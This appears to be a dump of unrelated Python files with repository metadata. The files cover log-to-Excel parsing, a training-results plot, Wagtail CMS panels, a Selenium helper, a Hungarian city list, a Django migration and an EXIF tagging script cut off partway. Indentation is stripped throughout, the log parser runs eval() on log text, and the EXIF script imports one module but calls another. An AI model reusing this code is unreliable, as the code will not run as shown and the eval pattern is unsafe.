def get_log_value(self, cut_content, dictInfo, re_target, strKey, strPostfix, nUnit, b_getMulti):
for line in cut_content:
# search pattern like "Power: (int/float) dBm"
if re.search(re_target, line) != None:
# get the figure of the line like "Power: 8.817 dBm\n"
fValue = eval(line.split(": ")[1].strip(strPostfix))
dictInfo[strKey] = fValue * nUnit
if not b_getMulti:
break;
# merge two list of dict to single list of dict
def mergeLogs(self):
try:
printLog("[I][mergeLogs] ------- Merging two Log data -------")
# listLTE and listZigbee both has same length
self.listInfo = [None] * len(self.listLTE)
for i in range (0, len(self.listLTE)):
self.listLTE[i].update(self.listZigbee[i]) # merge two dict
self.listInfo[i] = self.listLTE[i]
printLog("[I][mergeLogs] ------- Merged two Log data -------")
except Exception as e:
printLog("[E][mergeLogs] Unexpected Error: " + str(e))
#/====================================================================\#
#| Functions of parsing log to excel |#
#\====================================================================/#
def log_to_excel(self):
printLog("[I][log_to_excel] ------- Parsing Log to Excel -------")
dictThreshold = {} # store INI threshold ata for setting conditional formating
try:
# ========== get the threshold data from INI ==========
printLog("[I][log_to_excel] ----- INI reading -----")
for key in self.listKey:
dictThreshold[key] = self.readINI(key)
printLog("[I][log_to_excel] ----- INI read -----")
# ========== New Excel workbook and sheets ==========
df_logInfo = pd.DataFrame(self.listInfo) # listInfo -> list of dict
listSheetName = ["Zigbee_Power_Current", "Zigbee_LAN", "LTE_Current", "LTE_dBm"]
listCol = [self.listKey[:6], self.listKey[6:8], self.listKey[8:11], self.listKey[11:15]] # columns for each sheet above
wb = openpyxl.Workbook() # 新增 Excel 活頁
wb.remove(wb['Sheet']) # remove the default sheet when start a workbook
printLog("[I][log_to_excel] ----- Excel Sheet Creating -----")
for i in range(0, len(listSheetName)):
self.newSheet(wb, listSheetName[i], df_logInfo[["SN"] + listCol[i]])
printLog("[I][log_to_excel] ----- Excel Sheet Created -----")
# modify cell font-color according to thershold that parsed from INI
self.set_threshold_to_excel(wb, dictThreshold)
wb.save('LTEV2.xlsx') # save the worksheet as excel file
printLog("[I][log_to_excel] ------- Parsed Log to Excel -------")
except Exception as e:
printLog("[E][log_to_excel] Unexpected Error: " + str(e))
# read INI values one by one by giving keys, then store to var dictThreshold
def readINI(self, strKey):
try:
config = configparser.ConfigParser()
config.read(g_strINIPath)
strMethod = 'Method%s' % g_nMethodIndex
strValue = config.get(strMethod, strKey)
# search pattern like "+-(int/float),+-(int/float)"
if re.fullmatch("[+-]?[0-9]+\.?[0-9]*,[+-]?[0-9]+\.?[0-9]*", strValue):
printLog("[I][readINI] %s = %s" % (strKey, strValue))
return strValue
else:
printLog("[W][readINI] Read %s Fail !!" % strKey)
sys.exit("Read %s Fail !!" % strKey)
except Exception as e:
printLog("[E][readINI] Error: %s" % str(e))
sys.exit("Error: %s" % str(e))
# new worksheets by DataFrame
def newSheet(self, workbook, strSheetName, df_SheetCol):
try:
workbook.create_sheet(strSheetName)
for row in dataframe_to_rows(df_SheetCol, index=False, header=True):
workbook[strSheetName].append(row)
printLog("[I][newSheet] Sheet: %s Created" % strSheetName)
except Exception as e:
printLog("[E][newSheet] Unexpected Error: " + str(e))
# set conditional formating for sheets by dictionay containg thershold data
def set_threshold_to_excel(self, workbook, dictThreshold):
try:
printLog("[I][set_threshold_to_excel] ----- threshold setting -----")
# iterate through every worksheet to set conditional formatting
for ws in workbook.worksheets:
printLog("[I][set_threshold_to_excel] setting worksheet: %s" % ws.title)
# iterate from Col 2 since Col 1 is the Serial Number(SN)
for col in ws.iter_cols(min_row=1, max_row=ws.max_row, min_col=2, max_col=ws.max_column):
strStart, strEnd = None, None # set the test range for cell e.g. A1:A10
istInterval = [] # set the threshold range for the formula below
# check the column is not empty, col[0] is column name
if len(col) > 1:
strStart = col[1].coordinate # set starting cell for thershold testing
strEnd = col[-1].coordinate # set ending cell
# get the thershold and store as interval for the formula below
strThreshold = dictThreshold[col[0].value] # get the test thershold by the column name(col[0])
listInterval = strThreshold.split(",")
red_text = Font(color="9C0006") # font-color: RED
range_string = "%s:%s" % (strStart, strEnd) # the value would be like A1:A10
ws.conditional_formatting.add(range_string,
CellIsRule(operator='notBetween', formula=listInterval, stopIfTrue=True, font=red_text))
printLog("[I][set_threshold_to_excel] ----- threshold set -----")
except Exception as e:
printLog("[E][set_threshold_to_excel] Unexpected Error: " + str(e))
#/====================================================================\#
#| Functions of printing log of LTE.py |#
#\====================================================================/#
def getDateTimeFormat():
strDateTime = "[%s]" % (time.strftime("%Y/%m/%d %H:%M:%S", time.localtime()))
return strDateTime
def printLog(strPrintLine):
strFileName = os.path.basename(__file__).split('.')[0]
fileLog = codecs.open(g_strFileName + ".log", 'a', "utf-8")
print(strPrintLine)
fileLog.write("%s%s\r\n" % (getDateTimeFormat(), strPrintLine))
fileLog.close()
if __name__ == "__main__":
global g_strFileName, g_strINIPath, g_nMethodIndex
g_strFileName = os.path.basename(__file__).split('.')[0]
g_strINIPath = os.path.join(os.getcwd(), g_strFileName + ".ini")
g_nMethodIndex = 1
printLog("========== Start ==========")
printLog("[I][main] Python " + sys.version)
printLog("[I][main] %s.py %s" % (g_strFileName, g_strVersion))
# ------------ find the target file --------------
try:
LogParser = cLogParser()
LogParser.log_to_excel()
except Exception as e:
printLog("[E][main] Unexpected Error: " + str(e))
printLog("========== End ==========")
| 2 | 2 |
cnn/test2.py | INFINITSY/darts | 0 | 17608 | <reponame>INFINITSY/darts
import matplotlib.pyplot as plt
import numpy as np
# darts_025 = [0, 0, 0, 0, 2, 5, 6, 7, 8]
darts_025 = [0, 0, 0, 2, 3, 5, 7, 8]
darts_05 = [0, 0, 3, 3, 4, 4, 5, 7, 7]
adas_025_9 = [0, 0, 0, 0, 3, 5, 7]
adas_05_9 = [0, 0, 1, 4, 5, 6, 6, 7, 7, 7, 7]
adas_05_95 = []
adas_05_97 = [0, 0, 0, 2, 4, 4, 4, 4, 4, 6, 8]
mile = [0, 0, 0, 2, 4, 4, 4, 3, 4, 4, 4]
mile_adas_025_9 = [0, 0, 0, 0, 3, 4, 5, 5, 6, 6, 6]
mile_adas_05_9 = [0, 0, 0, 3, 4, 5, 5, 5, 5, 6, 6]
mile_adas_05_95 = [0, 0, 0, 0, 1, 1, 5, 5, 6, 6, 6]
mile_adas_05_97 = [0, 0, 0, 0, 0, 3, 3, 4, 4, 4, 4]
plt.plot(range(0, 36, 5), darts_025, '-o', label='DARTS, lr: 0.025')
# plt.plot(range(0, 41, 5), darts_05, '-o', label='DARTS, lr: 0.05')
#
# # plt.plot(range(0, 31, 5), adas_025_9, '-o', label='DARTS+Adas, lr: 0.025, beta: 0.9')
# # plt.plot(range(0, 51, 5), adas_05_9, '-o', label='DARTS+Adas, lr: 0.05, beta: 0.9')
# # plt.plot(range(0, 51, 5), adas_05_97, '-o', label='DARTS+Adas, lr: 0.05, beta: 0.97')
plt.plot(range(0, 51, 5), mile, '--o', label='MiLeNAS, lr: 0.025')
plt.plot(range(0, 51, 5), mile_adas_025_9, '--o', label='MiLeNAS+Adas, lr: 0.025, beta: 0.9')
plt.plot(range(0, 51, 5), mile_adas_05_9, '--o', label='MiLeNAS+Adas, lr: 0.05, beta: 0.9')
plt.plot(range(0, 51, 5), mile_adas_05_95, '--o', label='MiLeNAS+Adas, lr: 0.05, beta: 0.95')
plt.plot(range(0, 51, 5), mile_adas_05_97, '--o', linewidth=3.0, label='MiLeNAS+Adas, lr: 0.05, beta: 0.97')
plt.xlabel('Epoch')
plt.ylabel('#Skip-connection')
plt.legend()
plt.show()
| 2.578125 | 3 |
great_international/panels/capital_invest.py | uktrade/directory-cms | 6 | 17609 | from wagtail.admin.edit_handlers import (
InlinePanel, HelpPanel, FieldPanel, FieldRowPanel, MultiFieldPanel,
PageChooserPanel,
)
from wagtail.documents.edit_handlers import DocumentChooserPanel
from wagtail.images.edit_handlers import ImageChooserPanel
from core.helpers import make_translated_interface
from core.panels import SearchEngineOptimisationPanel
class InternationalCapitalInvestLandingPagePanels:
content_panels = [
FieldPanel('title'),
FieldPanel('breadcrumbs_label'),
MultiFieldPanel(
heading="Hero",
children=[
ImageChooserPanel('hero_image'),
FieldPanel('hero_title'),
FieldPanel('hero_subheading'),
FieldPanel('hero_subtitle'),
FieldPanel('hero_cta_text'),
FieldPanel('hero_cta_link'),
]
),
MultiFieldPanel(
heading="Reason to invest in the UK section",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Reason to Invest Title, Reason to Invest Content'),
FieldPanel('reason_to_invest_section_title'),
FieldPanel('reason_to_invest_section_intro'),
FieldPanel('reason_to_invest_section_content'),
ImageChooserPanel('reason_to_invest_section_image'),
FieldPanel('how_we_help_title'),
FieldPanel('how_we_help_intro'),
HelpPanel('Each icon requires corresponding text to show '
'on page'),
FieldRowPanel([
MultiFieldPanel([
ImageChooserPanel('how_we_help_one_icon'),
FieldPanel('how_we_help_one_text'),
]),
MultiFieldPanel([
ImageChooserPanel('how_we_help_two_icon'),
FieldPanel('how_we_help_two_text'),
]),
]),
FieldRowPanel([
MultiFieldPanel([
ImageChooserPanel('how_we_help_three_icon'),
FieldPanel('how_we_help_three_text'),
]),
MultiFieldPanel([
ImageChooserPanel('how_we_help_four_icon'),
FieldPanel('how_we_help_four_text'),
]),
]),
FieldPanel('how_we_help_cta_text'),
FieldPanel('how_we_help_cta_link'),
]
),
MultiFieldPanel(
heading="Investment Opportunities by regions",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Region Opportunity Title, 1 Related Region'),
FieldPanel('region_ops_section_title'),
FieldPanel('region_ops_section_intro'),
InlinePanel(
'added_region_card_fields',
label="Region card fields"
),
]
),
MultiFieldPanel(
heading="Informative banner",
children=[
FieldPanel('banner_information')
],
),
MultiFieldPanel(
heading="Related region pages",
classname='collapsible collapsed',
children=[
HelpPanel('Please use this to link to a related region, '
'rather than adding in manually the region title, '
'image and text in the above section when the '
'capital invest region pages are available'),
InlinePanel(
'added_regions',
label="Related Regions"
),
]
),
MultiFieldPanel(
heading="Energy Sector",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Energy Sector Title, Energy Sector Content'),
FieldPanel('energy_sector_title'),
FieldPanel('energy_sector_content'),
ImageChooserPanel('energy_sector_image'),
HelpPanel('CTA requires text and PDF to show on teh page.'),
FieldPanel('energy_sector_cta_text'),
DocumentChooserPanel('energy_sector_pdf_document'),
]
),
MultiFieldPanel(
heading="Homes in England Section",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Homes In England Section Title, Title and PDF '
'for each card'),
FieldPanel('homes_in_england_section_title'),
InlinePanel(
'added_homes_in_england_card_fields',
label="Homes In England cards"
)
]
),
MultiFieldPanel(
heading="Contact Section",
classname='collapsible collapsed',
children=[
HelpPanel('Required fields for section to show: '
'Contact Title, Contact Text'),
FieldPanel('contact_section_title'),
FieldPanel('contact_section_text'),
FieldPanel('contact_section_cta_text')
]
),
SearchEngineOptimisationPanel()
]
settings_panels = [
FieldPanel('slug'),
]
edit_handler = make_translated_interface(
content_panels=content_panels,
settings_panels=settings_panels
)
class CapitalInvestRegionPagePanels:
content_panels = [
FieldPanel('title'),
FieldPanel('breadcrumbs_label'),
MultiFieldPanel(
heading="Hero",
children=[
FieldPanel('hero_title'),
ImageChooserPanel('hero_image'),
],
),
FieldPanel('featured_description'),
MultiFieldPanel(
heading="Region summary",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Region Summary Section Content'),
ImageChooserPanel('region_summary_section_image'),
FieldPanel('region_summary_section_intro'),
FieldPanel('region_summary_section_content'),
],
),
MultiFieldPanel(
heading="Investment opportunities",
classname='collapsible collapsed',
children=[
FieldPanel('investment_opps_title'),
FieldPanel('investment_opps_intro'),
]
),
MultiFieldPanel(
heading="Economics Statistics",
classname='collapsible',
children=[
HelpPanel('Required: at least 4 statistics for the section to show'),
FieldRowPanel([
MultiFieldPanel([
FieldPanel('economics_stat_1_heading'),
FieldPanel('economics_stat_1_number'),
FieldPanel('economics_stat_1_smallprint'),
]),
MultiFieldPanel([
FieldPanel('economics_stat_2_heading'),
FieldPanel('economics_stat_2_number'),
FieldPanel('economics_stat_2_smallprint'),
]),
MultiFieldPanel([
FieldPanel('economics_stat_3_heading'),
FieldPanel('economics_stat_3_number'),
FieldPanel('economics_stat_3_smallprint'),
]),
]),
FieldRowPanel([
MultiFieldPanel([
FieldPanel('economics_stat_4_heading'),
FieldPanel('economics_stat_4_number'),
FieldPanel('economics_stat_4_smallprint'),
]),
MultiFieldPanel([
FieldPanel('economics_stat_5_heading'),
FieldPanel('economics_stat_5_number'),
FieldPanel('economics_stat_5_smallprint'),
]),
MultiFieldPanel([
FieldPanel('economics_stat_6_heading'),
FieldPanel('economics_stat_6_number'),
FieldPanel('economics_stat_6_smallprint'),
]),
]),
],
),
MultiFieldPanel(
heading="Location Statistics",
classname='collapsible',
children=[
HelpPanel('Required: at least 4 statistics for the section to show'),
FieldRowPanel([
MultiFieldPanel([
FieldPanel('location_stat_1_heading'),
FieldPanel('location_stat_1_number'),
FieldPanel('location_stat_1_smallprint'),
]),
MultiFieldPanel([
FieldPanel('location_stat_2_heading'),
FieldPanel('location_stat_2_number'),
FieldPanel('location_stat_2_smallprint'),
]),
MultiFieldPanel([
FieldPanel('location_stat_3_heading'),
FieldPanel('location_stat_3_number'),
FieldPanel('location_stat_3_smallprint'),
]),
]),
FieldRowPanel([
MultiFieldPanel([
FieldPanel('location_stat_4_heading'),
FieldPanel('location_stat_4_number'),
FieldPanel('location_stat_4_smallprint'),
]),
MultiFieldPanel([
FieldPanel('location_stat_5_heading'),
FieldPanel('location_stat_5_number'),
FieldPanel('location_stat_5_smallprint'),
]),
MultiFieldPanel([
FieldPanel('location_stat_6_heading'),
FieldPanel('location_stat_6_number'),
FieldPanel('location_stat_6_smallprint'),
]),
]),
],
),
MultiFieldPanel(
heading="Extra optional Property and Infrastructure section",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Property and Infrastructure Section Title, '
'Property and Infrastructure Section Content'),
ImageChooserPanel('property_and_infrastructure_section_image'),
FieldPanel('property_and_infrastructure_section_title'),
FieldPanel('property_and_infrastructure_section_content'),
],
),
MultiFieldPanel(
heading="Accordions subsections",
classname='collapsible collapsed',
children=[
HelpPanel('Required: subsections title and at least one title and content for an accordion to show'),
FieldPanel('subsections_title'),
FieldRowPanel([
MultiFieldPanel([
FieldPanel('sub_section_one_title'),
ImageChooserPanel('sub_section_one_icon'),
FieldPanel('sub_section_one_content')
]),
MultiFieldPanel([
FieldPanel('sub_section_two_title'),
ImageChooserPanel('sub_section_two_icon'),
FieldPanel('sub_section_two_content')
]),
MultiFieldPanel([
FieldPanel('sub_section_three_title'),
ImageChooserPanel('sub_section_three_icon'),
FieldPanel('sub_section_three_content')
]),
]),
]
),
MultiFieldPanel(
heading="Case study",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Case Study Image, Case Study Title'),
ImageChooserPanel('case_study_image'),
FieldPanel('case_study_title'),
FieldPanel('case_study_text'),
HelpPanel('Cta\'s require both text and a link to show '
'on page. '),
FieldPanel('case_study_cta_text'),
FieldPanel('case_study_cta_link'),
],
),
MultiFieldPanel(
heading="Contact",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Contact Title, Contact Text'),
FieldPanel('contact_title'),
FieldPanel('contact_text'),
FieldPanel('contact_cta_text'),
FieldPanel('contact_cta_link'),
],
),
SearchEngineOptimisationPanel()
]
settings_panels = [
FieldPanel('slug'),
]
edit_handler = make_translated_interface(
content_panels=content_panels,
settings_panels=settings_panels
)
class CapitalInvestOpportunityListingPagePanels:
content_panels = [
FieldPanel('title'),
FieldPanel('breadcrumbs_label'),
FieldPanel('search_results_title'),
SearchEngineOptimisationPanel()
]
settings_panels = [
FieldPanel('slug'),
]
edit_handler = make_translated_interface(
content_panels=content_panels,
settings_panels=settings_panels
)
class CapitalInvestOpportunityPagePanels:
content_panels = [
FieldPanel('title'),
MultiFieldPanel(
heading="Related sector",
classname='collapsible collapsed',
children=[
InlinePanel('related_sectors', label="Related Sectors"),
],
),
MultiFieldPanel(
heading="Related region",
classname='collapsible collapsed',
children=[
PageChooserPanel(
'related_region',
[
'great_international.'
'AboutUkRegionPage'
]
),
],
),
FieldPanel('breadcrumbs_label'),
MultiFieldPanel(
heading="Hero",
children=[
ImageChooserPanel('hero_image'),
FieldPanel('hero_title'),
],
),
MultiFieldPanel(
heading="Opportunity summary",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Opportunity Summary Intro'),
FieldPanel('opportunity_summary_intro'),
FieldPanel('opportunity_summary_content'),
ImageChooserPanel('opportunity_summary_image'),
],
),
MultiFieldPanel(
heading="Opportunity Details",
classname='collapsible',
children=[
HelpPanel('Icons require the corresponding text to show on '
'page'),
FieldRowPanel([
MultiFieldPanel([
ImageChooserPanel('location_icon'),
FieldPanel('location_heading'),
FieldPanel('location'),
]),
MultiFieldPanel([
ImageChooserPanel('project_promoter_icon'),
FieldPanel('project_promoter_heading'),
FieldPanel('project_promoter'),
]),
MultiFieldPanel([
ImageChooserPanel('scale_icon'),
FieldPanel('scale_heading'),
FieldPanel('scale'),
FieldPanel('scale_value'),
]),
]),
FieldRowPanel([
MultiFieldPanel([
ImageChooserPanel('sector_icon'),
FieldPanel('sector_heading'),
InlinePanel('related_sub_sectors',
label="Related Sectors"),
]),
MultiFieldPanel([
ImageChooserPanel('investment_type_icon'),
FieldPanel('investment_type_heading'),
FieldPanel('investment_type'),
]),
MultiFieldPanel([
ImageChooserPanel('planning_status_icon'),
FieldPanel('planning_status_heading'),
FieldPanel('planning_status'),
]),
]),
],
),
MultiFieldPanel(
heading="Project Details",
classname='collapsible',
children=[
HelpPanel('Title requires corresponding text to show on page'),
FieldPanel('project_background_title'),
FieldPanel('project_background_intro'),
FieldRowPanel([
MultiFieldPanel([
FieldPanel('project_description_title'),
FieldPanel('project_description_content'),
]),
MultiFieldPanel([
FieldPanel('project_promoter_title'),
FieldPanel('project_promoter_content'),
]),
]),
ImageChooserPanel('project_image')
],
),
MultiFieldPanel(
heading="Similar projects",
classname='collapsible',
children=[
HelpPanel('Section shows if there are opportunities with the same related sector. '
'They are chosen randomly. Cta\'s require both text and a link to show '
'on page. '),
FieldPanel('similar_projects_cta_text'),
FieldPanel('similar_projects_cta_link'),
],
),
MultiFieldPanel(
heading="Case study",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Case Study Image, Case Study Title'),
ImageChooserPanel('case_study_image'),
FieldPanel('case_study_title'),
FieldPanel('case_study_text'),
HelpPanel('Cta\'s require both text and a link to show '
'on page. '),
FieldPanel('case_study_cta_text'),
FieldPanel('case_study_cta_link'),
],
),
MultiFieldPanel(
heading="Contact",
classname='collapsible',
children=[
HelpPanel('Required fields for section to show: '
'Contact Title, Contact Text'),
FieldPanel('contact_title'),
FieldPanel('contact_text'),
],
),
SearchEngineOptimisationPanel()
]
settings_panels = [
FieldPanel('slug'),
]
edit_handler = make_translated_interface(
content_panels=content_panels,
settings_panels=settings_panels,
)
class CapitalInvestContactFormPagePanels:
content_panels = [
FieldPanel('title'),
FieldPanel('breadcrumbs_label'),
FieldPanel('heading'),
FieldPanel('intro'),
FieldPanel('comment'),
FieldPanel('cta_text'),
SearchEngineOptimisationPanel()
]
settings_panels = [
FieldPanel('slug'),
]
edit_handler = make_translated_interface(
content_panels=content_panels,
settings_panels=settings_panels,
)
class CapitalInvestContactFormSuccessPagePanels:
content_panels = [
FieldPanel('title'),
FieldPanel('message_box_heading'),
FieldPanel('message_box_description'),
FieldPanel('what_happens_next_description')
]
settings_panels = [
FieldPanel('slug'),
]
edit_handler = make_translated_interface(
content_panels=content_panels,
settings_panels=settings_panels,
)
| 2.015625 | 2 |
_6_EXERCISE_BASIC SYNTAX, CONDITIONAL STATEMENTS AND LOOPS/_7_Maximum_Multiple.py | YordanPetrovDS/Python_Fundamentals | 0 | 17610 | <gh_stars>0
divisor = int(input())
bound = int(input())
for num in range(bound, 0, -1):
if num % divisor == 0:
print(num)
break
| 3.5 | 4 |
Task1C.py | benkw26/IA-Flood-Warning-Project | 0 | 17611 | from floodsystem.geo import stations_within_radius
from floodsystem.stationdata import build_station_list
def run():
"""Requirements for Task 1C"""
# Build list of stations
stations = build_station_list()
# Store the coordinates of Cambridge City Centre
CambCoord = (52.2053, 0.1218)
#store the radius value
radius = 10
near_cambstations = stations_within_radius(stations, CambCoord, radius)
print(sorted([station.name for station in near_cambstations]))
if __name__ == "__main__":
print("*** Task 1C: CUED Part IA Flood Warning System ***")
run() | 3.25 | 3 |
fixture/project.py | Sashatq/bugtrack | 0 | 17612 | from model.objects import Objects
import time
class ProjectHelper:
def __init__(self, app):
self.app = app
project_cache = None
def get_project_list(self):
if self.project_cache is None:
wd = self.app.wd
self.open_manage_project_page()
self.project_cache = []
for row in wd.find_elements_by_xpath("//div[@id='content']/div[2]/table/tbody/tr"):
cells = row.find_elements_by_tag_name("td")
pname = cells[0].text
description = cells[4].text
self.project_cache.append(Objects(pname=pname, description=description))
return list(self.project_cache)
def open_manage_project_page(self):
wd = self.app.wd
wd.find_element_by_link_text("Manage").click()
wd.find_element_by_link_text("Manage Projects").click()
def create(self, objects):
wd = self.app.wd
self.open_manage_project_page()
wd.find_element_by_xpath("//input[@value='Create New Project']").click()
self.fill_form(objects)
wd.find_element_by_xpath("//input[@value='Add Project']").click()
time.sleep(4)
self.project_cache = None
def fill_form(self, objects):
self.change_field_value("name", objects.pname)
self.change_field_value("description", objects.description)
def change_field_value(self, field_name, text):
wd = self.app.wd
if text is not None:
wd.find_element_by_name(field_name).click()
wd.find_element_by_name(field_name).clear()
wd.find_element_by_name(field_name).send_keys(text)
def delete_project(self):
wd = self.app.wd
wd.find_element_by_xpath("//div[@id='sidebar']/ul/li[7]/a/i").click()
wd.find_element_by_link_text("Manage Projects").click()
wd.find_element_by_css_selector("td > a").click()
wd.find_element_by_xpath("//input[@value='Delete Project']").click()
wd.find_element_by_xpath("//input[@value='Delete Project']").click()
| 2.5625 | 3 |
john_doe/cities/hungary.py | xioren/JohnDoe | 0 | 17613 | <reponame>xioren/JohnDoe
cities = [
'Budapest',
'Debrecen',
'Miskolc',
'Szeged',
'Pecs',
'Zuglo',
'Gyor',
'Nyiregyhaza',
'Kecskemet',
'Szekesfehervar',
'Szombathely',
'Jozsefvaros',
'Paradsasvar',
'Szolnok',
'Tatabanya',
'Kaposvar',
'Bekescsaba',
'Erd',
'Veszprem',
'Erzsebetvaros',
'Zalaegerszeg',
'Kispest',
'Sopron',
'Eger',
'Nagykanizsa',
'Dunaujvaros',
'Hodmezovasarhely',
'Salgotarjan',
'Cegled',
'Ozd',
'Baja',
'Vac',
'Szekszard',
'Papa',
'Gyongyos',
'Kazincbarcika',
'Godollo',
'Gyula',
'Hajduboszormeny',
'Kiskunfelegyhaza',
'Ajka',
'Oroshaza',
'Mosonmagyarovar',
'Dunakeszi',
'Kiskunhalas',
'Esztergom',
'Jaszbereny',
'Komlo',
'Nagykoros',
'Mako',
'Budaors',
'Szigetszentmiklos',
'Tata',
'Szentendre',
'Hajduszoboszlo',
'Siofok',
'Torokszentmiklos',
'Hatvan',
'Karcag',
'Gyal',
'Monor',
'Keszthely',
'Varpalota',
'Bekes',
'Dombovar',
'Paks',
'Oroszlany',
'Komarom',
'Vecses',
'Mezotur',
'Mateszalka',
'Mohacs',
'Csongrad',
'Kalocsa',
'Kisvarda',
'Szarvas',
'Satoraljaujhely',
'Hajdunanas',
'Balmazujvaros',
'Mezokovesd',
'Tapolca',
'Szazhalombatta',
'Balassagyarmat',
'Tiszaujvaros',
'Dunaharaszti',
'Fot',
'Dabas',
'Abony',
'Berettyoujfalu',
'Puspokladany',
'God',
'Sarvar',
'Gyomaendrod',
'Kiskoros',
'Pomaz',
'Mor',
'Sarospatak',
'Batonyterenye',
'Bonyhad',
'Gyomro',
'Tiszavasvari',
'Ujfeherto',
'Nyirbator',
'Sarbogard',
'Nagykata',
'Budakeszi',
'Pecel',
'Pilisvorosvar',
'Sajoszentpeter',
'Szigethalom',
'Balatonfured',
'Hajduhadhaz',
'Kisujszallas',
'Dorog',
'Kormend',
'Marcali',
'Barcs',
'Tolna',
'Tiszafured',
'Kiskunmajsa',
'Tiszafoldvar',
'Albertirsa',
'Nagyatad',
'Tiszakecske',
'Toeroekbalint',
'Koszeg',
'Celldomolk',
'Heves',
'Mezobereny',
'Szigetvar',
'Pilis',
'Veresegyhaz',
'Bicske',
'Edeleny',
'Lajosmizse',
'Kistarcsa',
'Hajdusamson',
'Csorna',
'Nagykallo',
'Isaszeg',
'Sarkad',
'Kapuvar',
'Ullo',
'Siklos',
'Toekoel',
'Maglod',
'Paszto',
'Szerencs',
'Turkeve',
'Szeghalom',
'Kerepes',
'Jaszapati',
'Janoshalma',
'Tamasi',
'Kunszentmarton',
'Hajdudorog',
'Vasarosnameny',
'Solymar',
'Rackeve',
'Derecske',
'Kecel',
'Nadudvar',
'Ocsa',
'Dunafoldvar',
'Fehergyarmat',
'Kiskunlachaza',
'Kunszentmiklos',
'Szentgotthard',
'Devavanya',
'Biatorbagy',
'Kunhegyes',
'Lenti',
'Ercsi',
'Balatonalmadi',
'Polgar',
'Tura',
'Suelysap',
'Fuzesabony',
'Jaszarokszallas',
'Gardony',
'Tarnok',
'Nyiradony',
'Zalaszentgrot',
'Sandorfalva',
'Soltvadkert',
'Nyergesujfalu',
'Bacsalmas',
'Csomor',
'Putnok',
'Veszto',
'Kistelek',
'Zirc',
'Halasztelek',
'Mindszent',
'Acs',
'Enying',
'Letavertes',
'Nyirtelek',
'Szentlorinc',
'Felsozsolca',
'Solt',
'Fegyvernek',
'Nagyecsed',
'Encs',
'Ibrany',
'Mezokovacshaza',
'Ujszasz',
'Bataszek',
'Balkany',
'Sumeg',
'Tapioszecso',
'Szabadszallas',
'Battonya',
'Polgardi',
'Mezocsat',
'Totkomlos',
'Piliscsaba',
'Szecseny',
'Fuzesgyarmat',
'Kaba',
'Pusztaszabolcs',
'Teglas',
'Mezohegyes',
'Jaszladany',
'Tapioszele',
'Aszod',
'Diosd',
'Taksony',
'Tiszalok',
'Izsak',
'Komadi',
'Lorinci',
'Alsozsolca',
'Kartal',
'Dunavarsany',
'Erdokertes',
'Janossomorja',
'Kerekegyhaza',
'Balatonboglar',
'Szikszo',
'Domsod',
'Nagyhalasz',
'Kisber',
'Kunmadaras',
'Berhida',
'Kondoros',
'Melykut',
'Jaszkiser',
'Csurgo',
'Csorvas',
'Nagyszenas',
'Ujkigyos',
'Tapioszentmarton',
'Tat',
'Egyek',
'Tiszaluc',
'Orbottyan',
'Rakoczifalva',
'Hosszupalyi',
'Paty',
'Elek',
'Vamospercs',
'Morahalom',
'Bugyi',
'Emod',
'Labatlan',
'Csakvar',
'Algyo',
'Kenderes',
'Csenger',
'Fonyod',
'Rakamaz',
'Martonvasar',
'Devecser',
'Orkeny',
'Tokaj',
'Tiszaalpar',
'Kemecse',
'Korosladany'
]
| 1.617188 | 2 |
carbon0/carbon_quiz/migrations/0010_auto_20200909_0853.py | Carbon0-Games/carbon0-web-app | 2 | 17614 | # Generated by Django 3.1.1 on 2020-09-09 12:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("carbon_quiz", "0009_auto_20200908_2201"),
]
operations = [
migrations.RemoveField(
model_name="mission",
name="description",
),
migrations.RemoveField(
model_name="mission",
name="status",
),
migrations.AddField(
model_name="mission",
name="action",
field=models.CharField(
help_text="Describes what the user needs to do.",
max_length=500,
null=True,
),
),
migrations.AddField(
model_name="mission",
name="clicks_needed",
field=models.IntegerField(
default=1, help_text="Number of the links user needs to click."
),
),
]
| 1.71875 | 2 |
wstack/cli/input.py | CCSGroupInternational/wstack | 0 | 17615 | import json
from ..webstack import run as webstack_run
def process(json_file_list):
for json_filename in json_file_list:
with open(json_filename) as json_file:
json_data = json.load(json_file)
webstack_data = json_data.get('webstack', None)
if webstack_data:
webstack_run(webstack_data)
| 2.5625 | 3 |
imgtags.py | Donearm/scripts | 25 | 17616 | <filename>imgtags.py<gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright (c) 2011-2019, <NAME>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
###############################################################################
#
# Requirements: Python 3.7 or later, Py3exiv
#
__author__ = "<NAME>"
__license__ = "GPL"
__version__ = "0.2"
__date__ = "20190912"
__email__ = "<EMAIL>"
__status__ = "beta"
import sys
import argparse
import os.path
import py3exiv
def argument_parser():
"""Argument parser"""
cli_parser = argparse.ArgumentParser()
cli_parser.add_argument("-f", "--force",
action="store_true",
help="force writing of tags regardless of them being already present",
dest="force")
cli_parser.add_argument("-i", "--image",
required=True,
action="store",
help="the image",
dest="image")
cli_parser.add_argument("-d", "--delete",
action="store_true",
help="delete all tags present in an image",
dest="delete")
cli_parser.add_argument(action="store",
nargs="*",
help="the tags to be written into the file",
dest="tags")
options = cli_parser.parse_args()
return options
def write_tags(image, key, tags):
"""Write each tags into the iptc key inside an image. Tags must be a list"""
image[key] = pyexiv2.IptcTag(key, tags)
image.write()
def delete_tags(metadata, key):
"""Delete any tags present inside an image"""
try:
metadata.__delitem__(key)
except KeyError:
print(("There's not a %s tag in this image, exiting..." % key))
return 1
def main ():
"""main loop"""
options = argument_parser()
image = os.path.abspath(options.image)
if os.path.isfile(image) and image.endswith(('jpg', 'JPG', 'jpeg', 'JPEG', 'png', 'PNG', 'tiff', 'TIFF')):
m = pyexiv2.ImageMetadata(image)
m.read()
iptckeys = m.iptc_keys
xmpkeys = m.xmp_keys
exifkeys = m.exif_keys
if options.delete:
# delete all tags
try:
